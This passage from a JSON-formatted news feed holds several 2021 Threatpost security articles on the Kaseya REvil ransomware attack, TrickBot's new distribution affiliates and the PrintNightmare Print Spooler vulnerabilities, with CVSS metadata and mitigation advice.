operations,\u201d Kaseya said. \u201cA patch will be required to be installed prior to restarting the VSA and a set of recommendations on how to increase your security posture.\u201d\n\nMeanwhile, \u201cwe have been advised by our outside experts, that customers who experienced ransomware and receive communication from the attackers should not click on any links \u2013 they may be weaponized,\u201d the firm added.\n\nThe company has also released a new version of a [compromise detection tool](<https://kaseya.box.com/s/p9b712dcwfsnhuq2jmx31ibsuef6xict>) for companies to analyze a system (either VSA server or managed endpoint) and determine whether any indicators of compromise (IoC), data encryption or the REvil ransom note are present.\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) and the FBI also offered joint [protection advice](<https://threatpost.com/kaseya-attack-fallout/167541/>) over the weekend for those not yet affected by the attacks.\n\nKaseya also took the software-as-a-service (SaaS) platform offline, reducing significantly the number of customers exposed to the internet and therefore for to attacks. Though it was scheduled to be back online Tuesday (the kickoff will be a staged comeback that will see functionality turned back on in waves), but Kaseya said that it ran into a problem with the update. It now plans to start restoring SaaS services no later than the evening of Thursday, July 8.\n\nAs for the on-prem patch, the company will be publishing a runbook Wednesday of the changes customers must to make to their environment to prepare for the patch release, which is now expected by Friday.\n\n### Planned Enhanced Security Measures\n\nAccording to Kaseya, the enhanced security measures that will be brought online with the SaaS update are:\n\n * 24/7 independent SOC for every VSA with the ability to quarantine and isolate files and entire VSA servers.\n * A complementary CDN with WAF for every VSA (including for on-premise users that opt-in and wish to use it)\n * Customers who whitelist IPs will be required to whitelist additional IPs.\n\nThis \u201cgreatly reduces the attack surface of Kaseya VSA overall,\u201d the company said.\n\n## **REvil Lowers Ransom for Universal Decryptor**\n\nREvil is offering a universal public decryption key that will remediate all impacted victims, it said. While the initial ransom price was $70 million, the gang has lowered its asking price to $50 million [according to one researcher](<https://twitter.com/jackhcable/status/1411906687968161792>).\n\nAbsent a universal decryptor, some impacted companies are turning to individual negotiations with REvil, according [to reports](<https://www.databreaches.net/some-kaseya-victims-privately-negotiating-with-revil/>). For instance, researcher Marco A. De Felice [described (in Italian)](<https://www.suspectfile.com/kaseya-data-breach-70m-per-il-decrittatore-universale-intanto-revil-tratta-privatamente-con-alcune-vittime/>) a set of observed chat logs, with various individual company ransoms being listed at $550,000 (and then lowered to $225,000), and in another case the ransom was less than $50,000.\n\nUnfortunately, for those already infected by the REvil ransomware, the ability to remediate an attack will come down to case-by-case security postures, such as having offline backups of files in place.\n\n\u201cREvil uses the Salsa20 symmetric stream algorithm for encrypting the content of files and the keys for it with an elliptic curve asymmetric algorithm,\u201d according to Kaspersky researchers. \u201cDecryption of files affected by this malware is impossible without the cybercriminals\u2019 keys due to the secure cryptographic scheme and implementation used in the malware.\u201d\n\n## **Zero Days, Not SolarWinds Part 2**\n\nThe attack itself appears to be more akin to the [Accellion attacks](<https://threatpost.com/accellion-zero-day-attacks-clop-ransomware-fin11/164150/>) that cropped up all spring rather than the devastating [SolarWinds supply-chain attack](<https://threatpost.com/solarwinds-attackers-dhs-emails/165110/>) earlier this year.\n\nThe former had to do with zero-day vulnerabilities that were present in the Accellion legacy File Transfer Appliance product. Bad actors with connections to the FIN11 and the Clop ransomware gang hit multiple Accellion FTA customers in the financially motivated attacks, including the Jones Day Law Firm, Kroger and Singtel. All received extortion emails threatening to publish stolen data on the \u201cCL0P^_- LEAKS\u201d .onion website.\n\nSolarWinds meanwhile was an attack that the U.S. attributed to the Russian government, which involved tampering with SolarWinds\u2019 back-end systems in order to push a boobytrapped software update to unsuspecting customers containing a backdoor. Follow-on espionage attacks then were attempted targeting tech firms and several U.S. government agencies.\n\nIn the Kaseya case, adversaries are exploiting at least one zero-day security vulnerability, to push ransomware to Kaseya\u2019s customers.\n\n\u201cThe attackers were able to exploit zero-day vulnerabilities in the VSA product to bypass authentication and run arbitrary command execution,\u201d the company [noted](<https://helpdesk.kaseya.com/hc/en-gb/articles/4403584098961>) in its technical incident analysis. \u201cThis allowed the attackers to leverage the standard VSA product functionality to deploy ransomware to endpoints. There is no evidence that Kaseya\u2019s VSA codebase has been maliciously modified.\u201d\n\nKaseya knew about one bug (CVE-2021-30116) before the attacks started \u2013 it had been reported to the company by the Dutch Institute for Vulnerability Disclosure (DIVD).\n\n\u201cDuring the entire process, Kaseya has shown that they were willing to put in the maximum effort and initiative into this case both to get this issue fixed and their customers patched,\u201d according to [a DIVD advisory](<https://csirt.divd.nl/2021/07/04/Kaseya-Case-Update-2/>). \u201cThey showed a genuine commitment to do the right thing. Unfortunately, we were beaten by REvil in the final sprint, as they could exploit the vulnerabilities before customers could even patch.\u201d\n\nSeparately, researchers at Huntress Labs identified a zero-day used in the attack, though it\u2019s unclear if it\u2019s separate from CVE-2021-30116: \u201cHuntress has confirmed that cybercriminals have exploited an arbitrary file upload and code injection vulnerability and have high confidence an authentication bypass was used to gain access into these servers,\u201d [it said](<https://www.huntress.com/blog/rapid-response-kaseya-vsa-mass-msp-ransomware-incident>).\n\nTruSec meanwhile noted that \u201c[while] not all details have been confirmed yet, but we can say with high confidence that the exploit involved multiple flaws: Authentication bypass; arbitrary file upload; code injection.\u201d\n\nAccording to Kaspersky, the exploit involves the attackers deploying a malicious dropper via a PowerShell script. That script disables Microsoft Defender features and then uses the certutil.exe utility to decode a malicious executable (agent.exe) that drops an older version of Microsoft Defender, along with the REvil ransomware packed into a malicious library. That library is then loaded by the legitimate MsMpEng.exe by utilizing the DLL side-loading technique, according to the firm.\n\nOther technical details on the bug and attack chain are scant, for now.\n\nKaseya is due to post another update Tuesday morning, and Threatpost will update this post accordingly.\n\n**Update 2: This post was updated at 2:15 p.m. ET on July 7 to reflect a revised patch timeline and expected debut of a runbook for preparing for the patch.**\n\n**Update 1: This post was updated at 10:30 a.m. ET on July 7 to include a revised patch timeline and planned enhanced security measures.**\n\n_**Check out our free **_[_**upcoming live and on-demand webinar events**_](<https://threatpost.com/category/webinars/>)_** \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community.**_\n", "cvss3": {}, "published": "2021-07-06T15:42:42", "type": "threatpost", "title": "Kaseya Patches Imminent After Zero-Day Exploits", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-30116"], "modified": "2021-07-06T15:42:42", "id": "THREATPOST:DBAD1B8DE4447AB94094A76E7F0EF6A1", "href": "https://threatpost.com/kaseya-patches-zero-day-exploits/167548/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-10-15T18:06:14", "description": "The cybercriminals behind the infamous TrickBot trojan have signed two additional distribution affiliates, dubbed Hive0106 (aka TA551) and Hive0107 by IBM X-Force. The result? Escalating ransomware hits on corporations, especially using the Conti ransomware.\n\nThe development also speaks to the TrickBot gang\u2019s increasing sophistication and standing in the cybercrime underground, IBM researchers said: \u201cThis latest development demonstrates the strength of its connections within the cybercriminal ecosystem and its ability to leverage these relationships to expand the number of organizations infected with its malware.\u201d\n\nThe TrickBot malware started life as a banking trojan back in 2016, but it quickly evolved to become a modular, full-service threat. It\u2019s capable of a range of backdoor and data-theft functions, can deliver additional payloads, and has the ability to quickly [move laterally](<https://threatpost.com/trickbot-port-scanning-module/163615/>) throughout an enterprise.\n\nAccording to IBM, the TrickBot gang (aka ITG23 or Wizard Spider) has now added powerful additional distribution tactics to its bag of tricks, thanks to the two new affiliates.\n\n\u201cEarlier this year, [the TrickBot gang] primarily relied on email campaigns delivering Excel documents and a call-center ruse known as BazarCall to deliver its payloads to corporate users,\u201d IBM researchers said in a [Wednesday analysis](<https://securityintelligence.com/posts/trickbot-gang-doubles-down-enterprise-infection/>). \u201cHowever\u2026the new affiliates have added the use of hijacked email threads and fraudulent website customer-inquiry forms. This move not only increased the volume of its delivery attempts but also diversified delivery methods with the goal of infecting more potential victims than ever.\u201d\n\nBazarCall is a [distribution tactic](<https://unit42.paloaltonetworks.com/bazarloader-malware/>) that starts with emails offering \u201ctrial subscriptions\u201d to various services \u2013 with a phone number listed to call customer service to avoid being charged money. If someone calls, a call-center operator answers and directs victims to a website to purportedly unsubscribe from the service: a process the \u201cagent\u201d walks the caller through. In the end, vulnerable computers become infected with malware \u2013 usually the [BazarLoader implant](<https://threatpost.com/bazarloader-malware-slack-basecamp/165455/>), which is another malware in the TrickBot gang\u2019s arsenal, and sometimes TrickBot itself. These types of attacks have continued into the autumn, enhanced by the fresh distribution approaches, according to IBM.\n\nMeanwhile, since 2020, the TrickBot gang has been heavily involved in the ransomware economy, with the TrickBot malware acting as an initial access point in campaigns. Users infected with the trojan will see their device become part of a botnet that attackers typically use to load the second-stage ransomware variant. The operators have developed their own ransomware as well, according to IBM: the Conti code, which is notorious for hitting hospitals, [destroying backup files](<https://threatpost.com/conti-ransomware-backups/175114/>) and pursuing [double-extortion tactics](<https://threatpost.com/double-extortion-ransomware-attacks-spike/154818/>).\n\nIBM noted that since the two affiliates came on board in June, there\u2019s been a corresponding increase in Conti ransomware attacks \u2013 not likely a coincidence.\n\n\u201cRansomware and extortion go hand in hand nowadays,\u201d according to the firm\u2019s analysis. \u201c[The TrickBot gang] has also adapted to the ransomware economy through the creation of the Conti ransomware-as-a-service (RaaS) and the use of its BazarLoader and Trickbot payloads to gain a foothold for ransomware attacks.\u201d\n\n## **Affiliate Hive0106: Spam Powerhouse **\n\nIBM X-Force researchers noted that the most important development since June for the distribution of the TrickBot gang\u2019s various kinds of malware is the newly minted partnership with Hive0106 (aka TA551, Shathak and UNC2420).\n\nHive0106 specializes in massive volumes of spamming and is a financially motivated threat group that\u2019s lately been looking to partner with elite cybercrime gangs, the firm said.\n\nHive0106 campaigns begin with hijacking email threads: a tactic pioneered by its frenemy [Emotet](<https://threatpost.com/emotet-takedown-infrastructure-netwalker-offline/163389/>). The tactic involves [jumping into ongoing correspondence](<https://unit42.paloaltonetworks.com/emotet-thread-hijacking/>) to respond to an incoming message under the guise of being the rightful account holder. These existing email threads are stolen from email clients during prior infections. Hive0106 is able to mount these campaigns at scale, researchers said, using newly created malicious domains to host malware payloads.\n\n\u201cThe emails include the email thread subject line but not the entire thread,\u201d according to IBM X-Force\u2019s writeup. \u201cWithin the email is an archive file containing a malicious attachment and password.\u201d\n\nIn the new campaigns, that malicious document drops an HTML application (HTA) file when macros are enabled.\n\n\u201cHTA files contain hypertext code and may also contain VBScript or JScript scripts, both of which are often used in boobytrapped macros,\u201d according to the analysis. \u201cThe HTA file then downloads Trickbot or BazarLoader, which has subsequently been observed downloading Cobalt Strike.\u201d\n\nCobalt Strike is the legitimate pen-testing tool that\u2019s [often abused by cybercriminals](<https://threatpost.com/cobalt-strike-cybercrooks/167368/>) to help with lateral movement. It\u2019s often a precursor to a ransomware infection.\n\n## **Hive0107 Comes on Board**\n\nAnother prominent affiliate that hooked its wagon up to the TrickBot gang this summer is Hive0107, which spent the first half of the year distributing the IcedID trojan (a [TrickBot rival](<https://threatpost.com/icedid-banking-trojan-surges-emotet/165314/>)). It switched horses to TrickBot in May, using its patented contact form distribution method.\n\nAnalysts \u201cobserved Hive0107 with occasional distribution campaigns of the Trickbot malware detected mid-May through mid-July 2021\u2026after that period, Hive0107 switched entirely to delivering BazarLoader,\u201d according to the researchers, who added that most of the campaigns target organizations in the U.S. and, to a lesser extent, Canada and Europe.\n\nHive0107 is well-known for using customer contact forms on company websites to send malicious links to unwitting employees. Usually, the messages it sends threaten legal action, according to the analysis.\n\nPreviously, the cybercriminals used copyright infringement as a ruse: \u201cThe group typically enters information into these contact forms \u2014 probably using automated methods \u2014 informing the targeted organization that it has illegally used copyrighted images and includes a link to their evidence,\u201d IBM X-Force researchers explained.\n\nIn the new campaigns, Hive0107 is using a different lure, the researchers said, claiming that the targeted company has been performing distributed denial-of-service (DDoS) attacks on its servers. Then, the messages provide a (malicious) link to purported evidence and how to remedy the situation.\n\nThe group also sends the same content via email to organization staff \u2013 an additional switch-up in tactics.\n\nIn any event, the links are hosted on legitimate cloud storage services where the payload lives, according to the analysis.\n\n\u201cClicking on the link downloads a .ZIP archive containing a malicious JScript (JS) downloader titled \u2018Stolen Images Evidence.js\u2019 or \u2018DDoS attack proof and instructions on how to fix it.js,'\u201d researchers explained. \u201cThe JS file contacts a URL on newly created domains to download BazarLoader.\u201d\n\nBazarLoader then goes on to download Cobalt Strike and a PowerShell script to exploit the [PrintNightmare vulnerability](<https://threatpost.com/microsoft-unpatched-printnightmare-zero-day/168613/>) (CVE-2021-34527), they added \u2013 and sometimes TrickBot.\n\n\u201cIBM suspects that access achieved through these Hive0107 campaigns is ultimately used to initiate a ransomware attack,\u201d the researchers noted.\n\nThe new affiliate campaigns are evidence of the TrickBot gang\u2019s continuing success breaking into the circle of the cybercriminal elite, the firm concluded \u2013 a trend IBM X-Force expects to continue into next year.\n\n\u201c[The gang] started out aggressively back in 2016 and has become a cybercrime staple in the Eastern European threat-actor arena,\u201d researchers said. \u201cIn 2021, the group has repositioned itself among the top of the cybercriminal industry.\u201d\n\nThey added, \u201cThe group already has demonstrated its ability to maintain and update its malware and infrastructure, despite the efforts of law enforcement and industry groups [to take it down](<https://threatpost.com/authorities-arrest-trickbot-member/169236/>).\u201d\n\n## **How to Protect Companies When TrickBot Hits**\n\nTo reduce the chances of suffering catastrophic damage from an infection (or a follow-on ransomware attack), IBM recommends taking the following steps:\n\n * **Ensure you have backup redundancy**, stored separately from network zones attackers could access with read-only access. The availability of effective backups is a significant differentiator for organizations and can support recovery from a ransomware attack.\n * **Implement a strategy to prevent unauthorized data theft**, especially as it applies to uploading large amounts of data to legitimate cloud storage platforms that attackers can abuse.\n * **Employ user-behavior analytics** to identify potential security incidents. When triggered, assume a breach has taken place. Audit, monitor and quickly act on suspected abuse related to privileged accounts and groups.\n * **Employ multi-factor authentication** on all remote access points into an enterprise network.\n * **Secure or disable remote desktop protocol (RDP).** Multiple ransomware attacks have been known to exploit weak RDP access to gain initial entry into a network.\n\n_**Check out our free **_[_**upcoming live and on-demand online town halls **_](<https://threatpost.com/category/webinars/>)_**\u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community.**_\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-15T18:05:29", "type": "threatpost", "title": "TrickBot Gang Enters Cybercrime Elite with Fresh Affiliates", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2021-10-15T18:05:29", "id": "THREATPOST:827A7E3B49365A0E49A11A05A5A29192", "href": "https://threatpost.com/trickbot-cybercrime-elite-affiliates/175510/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-07-08T07:53:10", "description": "Microsoft has released an emergency patch for the PrintNightmare, a set of two critical remote code-execution (RCE) vulnerabilities in the Windows Print Spooler service that hackers can use to take over an infected system. However, more fixes are necessary before all Windows systems affected by the bug are completely protected, according to the federal government.\n\nMicrosoft on Tuesday released an [out-of-band update](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>) for several versions of Windows to address [CVE-2021-34527](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34527>), the second of two bugs that were initially thought to be one flaw and which have been dubbed PrintNightmare by security researchers.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\nHowever, the latest fix only appears to address the RCE variants of PrintNightmare, and not the local privilege escalation (LPE) variant, according to an [advisory](<https://us-cert.cisa.gov/ncas/current-activity/2021/07/06/microsoft-releases-out-band-security-updates-printnightmare>) by the Cybersecurity Infrastructure and Security Administration (CISA), citing a [VulNote](<https://www.kb.cert.org/vuls/id/383432>) published by the CERT Coordination Center (CERT/CC).\n\nMoreover, the updates do not include Windows 10 version 1607, Windows Server 2012 or Windows Server 2016, which will be patched at a later date, according to CERT/CC.\n\n## **A Tale of Two Vulnerabilities**\n\nThe PrintNightmare saga [began last Tuesday](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>) when a proof-of-concept (PoC) exploit for the vulnerability \u2014 at that time tracked as CVE-2021-1675 \u2014 was dropped on GitHub showing how an attacker can exploit the vulnerability to take control of an affected system. While it was taken back down within a few hours, the code was copied and remains in circulation on the platform.\n\nThe response to the situation soon turned into confusion. Though Microsoft released an [patch for CVE-2021-1675](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675>) in it its usual raft of [monthly Patch Tuesday updates](<https://threatpost.com/microsoft-patch-tuesday-in-the-wild-exploits/166724/>), addressing what it thought was a minor EoP vulnerability, the listing was updated later in the week after researchers from Tencent and NSFOCUS TIANJI Lab figured out it could be used for RCE.\n\nHowever, it soon became clear to many experts that Microsoft\u2019s initial patch didn\u2019t fix the entire problem. CERT/CC on Thursday offered its own workaround for PrintNightmare, advising system administrators to disable the Windows Print Spooler service in Domain Controllers and systems that do not print.\n\nTo further complicate matters, Microsoft also last Thursday dropped [a notice](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>) for a bug called \u201cWindows Print Spooler Remote Code Execution Vulnerability\u201d that appeared to be the same vulnerability, but with a different CVE number\u2014in this case, CVE-2021-34527.\n\n\u201cThis vulnerability is similar but distinct from the vulnerability that is assigned CVE-2021-1675, which addresses a different vulnerability in RpcAddPrinterDriverEx(),\u201d the company wrote in the advisory at the time. \u201cThe attack vector is different as well. CVE-2021-1675 was addressed by the June 2021 security update.\u201d\n\n## **Microsoft Issues Incomplete Patch**\n\nThe fix released this week addresses CVE-2021-34527, and includes protections for CVE-2021-1675, according to the CISA, which is encouraging users and administrators to review the [Microsoft Security Updates](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>) as well as [CERT/CC Vulnerability Note VU #383432](<https://www.kb.cert.org/vuls/id/383432>) and apply the necessary updates or workarounds.\n\nBut as noted, it won\u2019t fix all systems.\n\nSo, in cases where a system is not protected by the patch, Microsoft is offering several workarounds for PrintNightmare. One is very similar to the federal government\u2019s solution from last week: To stop and disable the Print Spooler service \u2014 and thus the ability to print both locally and remotely \u2014 by using the following PowerShell commands: Stop-Service -Name Spooler -Force and Set-Service -Name Spooler -StartupType Disabled.\n\nThe second workaround is to disable inbound remote printing through Group Policy by disabling the \u201cAllow Print Spooler to accept client connections\u201d policy to block remote attacks, and then restarting the system. In this case, the system will no longer function as a print server, but local printing to a directly attached device will still be possible.\n\nAnother potential option to prevent remote exploitation of the bug that has worked in \u201climited testing\u201d is to block both the RPC Endpoint Mapper (135/tcp) and SMB (139/tcp and 445/tcp) at the firewall level, according to CERT/CC. However, \u201cblocking these ports on a Windows system may prevent expected capabilities from functioning properly, especially on a system that functions as a server,\u201d the center advised.\n\n_**Check out our free **_[_**upcoming live and on-demand webinar events**_](<https://threatpost.com/category/webinars/>)_** \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community.**_\n", "cvss3": {}, "published": "2021-07-07T10:55:02", "type": "threatpost", "title": "Microsoft Releases Emergency Patch for PrintNightmare Bugs", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2021-07-07T10:55:02", "id": "THREATPOST:6F7C157D4D3EB409080D90F02185E728", "href": "https://threatpost.com/microsoft-emergency-patch-printnightmare/167578/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-19T16:25:33", "description": "Microsoft has warned of yet another vulnerability that\u2019s been discovered in its Windows Print Spooler that can allow attackers to elevate privilege to gain full user rights to a system. The advisory comes on the heels of patching two other remote code-execution (RCE) bugs found in the print service that collectively became known as PrintNightmare.\n\nThe company released [the advisory](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34481>) late Thursday for the latest bug, a Windows Print Spooler elevation-of-privilege vulnerability tracked as [CVE-2021-34481](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34481>). Microsoft credited Dragos vulnerability researcher Jacob Baines for identifying the issue.\n\nThe vulnerability \u201cexists when the Windows Print Spooler service improperly performs privileged file operations,\u201d according to Microsoft.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\nAttackers who successfully exploit the bug can run arbitrary code with SYSTEM privileges, allowing them to install programs, view, change or delete data, or create new accounts with full user rights, the company said.\n\nTo work around the bug, administrators and users should stop and disable the Print Spooler service, Microsoft said.\n\n## **Slightly Less of a \u2018PrintNightmare\u2019**\n\nThe vulnerability is the latest in a flurry of problems discovered in Windows Print Spooler, but seems slightly less dangerous, as it can only be exploited locally. It rates 7.8 out of 10 on the CVSS vulnerability-severity scale.\n\nIndeed, [Baines told BleepingComputer](<https://www.bleepingcomputer.com/news/microsoft/microsoft-shares-guidance-on-new-windows-print-spooler-vulnerability/>) that while the bug is print driver-related, \u201cthe attack is not really related to PrintNightmare.\u201d Baines plans to disclose more about the little-known vulnerability in [an upcoming presentation](<https://defcon.org/html/defcon-29/dc-29-speakers.html#baines>) at DEF CON in August.\n\nThe entire saga surrounding Windows Print Spooler [began Tuesday, June 30](<https://threatpost.com/poc-exploit-windows-print-spooler-bug/167430/>), when a proof-of-concept (PoC) for an initial vulnerability in the print service was dropped on GitHub showing how an attacker can exploit the flaw to take control of an affected system.\n\nThe response to the situation soon turned into confusion. Though Microsoft released an [update for CVE-2021-1675](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675>) in it its usual raft of [monthly Patch Tuesday updates](<https://threatpost.com/microsoft-patch-tuesday-in-the-wild-exploits/166724/>), fixing what it thought was a minor elevation-of-privilege vulnerability, the listing was updated later in the week after researchers from Tencent and NSFOCUS TIANJI Lab figured out it could be used for RCE.\n\nHowever, soon after it became clear to many experts that Microsoft\u2019s initial patch didn\u2019t fix the entire problem. The federal government even stepped in last Thursday, when CERT/CC [offered its own mitigation](<https://threatpost.com/cisa-mitigation-printnightmare-bug/167515/>) for PrintNightmare that Microsoft has since adopted \u2014 advising system administrators to disable the Windows Print Spooler service in Domain Controllers and systems that do not print.\n\nTo further complicate matters, Microsoft also last Thursday dropped [a notice](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>) for a bug called \u201cWindows Print Spooler Remote Code Execution Vulnerability\u201d that appeared to be the same vulnerability, but with a different CVE number\u2014in this case, CVE-2021-34527. The company explained that the second bug was similar to the earlier PrintNightmare vulnerability but also its own distinct entity.\n\nEventually, Microsoft last Wednesday [released an emergency cumulative patch](<https://threatpost.com/microsoft-emergency-patch-printnightmare/167578/>) for both PrintNightmare bugs that included all previous patches as well as protections for CVE-2021-1675 as well as a new fix for CVE-2021-34527.\n\nHowever, that fix also [was incomplete](<https://www.kb.cert.org/vuls/id/383432>), and Microsoft continues to work on further remediations as it also works to patch this latest bug, CVE-2021-34481. In the meantime, affected customers should install the most recent Microsoft updates as well as use the workaround to avoid exploitation, the company said.\n\n**_Check out our free _**[**_upcoming live and on-demand webinar events_**](<https://threatpost.com/category/webinars/>)**_ \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community._**\n", "cvss3": {}, "published": "2021-07-16T11:57:53", "type": "threatpost", "title": "Microsoft: Unpatched Bug in Windows Print Spooler", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-1675", "CVE-2021-34481", "CVE-2021-34527"], "modified": "2021-07-16T11:57:53", "id": "THREATPOST:A8242348917526090B7A1B23735D5C6C", "href": "https://threatpost.com/microsoft-unpatched-bug-windows-print-spooler/167855/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-13T19:49:18", "description": "One day after dropping its scheduled August Patch Tuesday update, Microsoft issued a warning about yet another unpatched privilege escalation/remote code-execution (RCE) vulnerability in the Windows Print Spooler that can be filed under the [PrintNightmare umbrella](<https://threatpost.com/cisa-mitigation-printnightmare-bug/167515/>).\n\nThe news comes amid plenty of PrintNightmare exploitation. Researchers from CrowdStrike warned in a [Wednesday report](<https://www.crowdstrike.com/blog/magniber-ransomware-caught-using-printnightmare-vulnerability/>) that the operators of the Magniber ransomware quickly weaponized CVE-2021-34527 to attack users in South Korea, with attacks dating back to at least July 13. And Cisco Talos [said Thursday](<https://blog.talosintelligence.com/2021/08/vice-society-ransomware-printnightmare.html>) that the Vice Society gang was seen using CVE-2021-1675 and CVE-2021-34527 to spread laterally across a victim\u2019s network as part of a recent ransomware attack.\n\n\u201cIn technology, almost nothing ages gracefully,\u201d Chris Clements, vice president of solutions architecture and Cerberus security officer at Cerberus Sentinel, told Threatpost. \u201cThe Print Spooler in Windows is proving that rule. It\u2019s likely that the code has changed little in the past decades and likely still bears a striking resemblance to source code that was made public in previous Windows leaks. I\u2019ve heard it said that ransomware gangs might also be referred to as \u2018technical debt collectors,\u2019 which would be funnier if the people suffering most from these vulnerabilities weren\u2019t Microsoft\u2019s customers.\u201d\n\n[![Infosec Insiders Newsletter](https://media.threatpost.com/wp-content/uploads/sites/103/2021/07/10165815/infosec_insiders_in_article_promo.png)](<https://threatpost.com/infosec-insider-subscription-page/?utm_source=ART&utm_medium=ART&utm_campaign=InfosecInsiders_Newsletter_Promo/>)\n\nThe fresh zero-day bug, tracked as CVE-2021-36958, carries a CVSS vulnerability-severity scale rating of 7.3, meaning that it\u2019s rated as \u201cimportant.\u201d Microsoft said that it allows for a local attack vector requiring user interaction, but that the attack complexity is low, with few privileges required.\n\n\u201cA remote code-execution vulnerability exists when the Windows Print Spooler service improperly performs privileged file operations,\u201d the computing giant explained in its [Wednesday advisory](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36958>). \u201cAn attacker who successfully exploited this vulnerability could run arbitrary code with SYSTEM privileges. An attacker could then install programs; view, change or delete data; or create new accounts with full user rights.\u201d\n\nThe CERT Coordination Center actually flagged the issue in mid-July, when it warned that a [working exploit](<https://twitter.com/gentilkiwi/status/1416429860566847490>) was available. That proof-of-concept (PoC), issued by Mimikatz creator Benjamin Delpy, comes complete with a video.\n\n> Hey guys, I reported the vulnerability in Dec'20 but haven't disclosed details at MSRC's request. It looks like they acknowledged it today due to the recent events with print spooler.\n> \n> \u2014 Victor Mata (@offenseindepth) [August 11, 2021](<https://twitter.com/offenseindepth/status/1425574625384206339?ref_src=twsrc%5Etfw>)\n\nOn Thursday, CERT/CC issued more details on the issue, explaining that it arises from an oversight in signature requirements around the \u201cPoint and Print\u201d capability, which allows users without administrative privileges to install printer drivers that execute with SYSTEM privileges via the Print Spooler service.\n\nWhile Microsoft requires that printers installable via Point are either signed by a WHQL release signature or by a trusted certificate, Windows printer drivers can specify queue-specific files that are associated with the use of the device, which leaves a loophole for malicious actors.\n\n\u201cFor example, a shared printer can specify a CopyFiles directive for arbitrary files,\u201d according to the CERT/CC [advisory](<https://www.kb.cert.org/vuls/id/131152>). \u201cThese files, which may be copied over alongside the digital-signature-enforced printer driver files, are not covered by any signature requirement. Furthermore, these files can be used to overwrite any of the signature-verified files that were placed on a system during printer driver install. This can allow for local privilege escalation to SYSTEM on a vulnerable system.\u201d\n\nMicrosoft credited Victor Mata of FusionX at Accenture Security with originally reporting the issue, which Mata said occurred back in December 2020:\n\n> Hey guys, I reported the vulnerability in Dec\u201920 but haven\u2019t disclosed details at MSRC\u2019s request. It looks like they acknowledged it today due to the recent events with print spooler.\n> \n> \u2014 Victor Mata (@offenseindepth) [August 11, 2021](<https://twitter.com/offenseindepth/status/1425574625384206339?ref_src=twsrc%5Etfw>)\n\nSo far, Microsoft hasn\u2019t seen any attacks in the wild using the bug, but it noted that exploitation is \u201cmore likely.\u201d With a working exploit in circulation, that seems a fair assessment.\n\n## **Print Spooler-Palooza and the PrintNightmare **\n\nDelpy characterized this latest zero-day as being part of the string of Print Spooler bugs collectively known as PrintNightmare.\n\nThe bad dream started in early July, when a PoC exploit for a bug tracked as CVE-2021-1675 was [dropped on GitHub](<https://threatpost.com/poc-exploit-windows-print-spooler-bug/167430/>). The flaw was originally addressed in [June\u2019s Patch Tuesday updates](<https://threatpost.com/microsoft-patch-tuesday-in-the-wild-exploits/166724/>) from Microsoft as a minor elevation-of-privilege vulnerability, but the PoC showed that it\u2019s actually a critical Windows security vulnerability that can be used for RCE. That prompted Microsoft to issue a different CVE number \u2013 in this case, CVE-2021-34527 \u2013 to designate the RCE variant, and it prompted [an emergency partial patch](<https://threatpost.com/microsoft-emergency-patch-printnightmare/167578/>), too.\n\n\u201cThis vulnerability is similar but distinct from the vulnerability that is assigned CVE-2021-1675, which addresses a different vulnerability in RpcAddPrinterDriverEx(),\u201d the company wrote in the advisory at the time. \u201cThe attack vector is different as well. CVE-2021-1675 was addressed by the June 2021 security update.\u201d\n\nBoth bugs \u2013 which are really just variants of a single issue \u2013 are collectively known as PrintNightmare. The PrintNightmare umbrella expanded a bit later in July, when yet another, [similar bug was disclosed](<https://threatpost.com/microsoft-unpatched-bug-windows-print-spooler/167855/>), tracked as CVE-2021-34481. It remained unpatched until it was finally addressed with 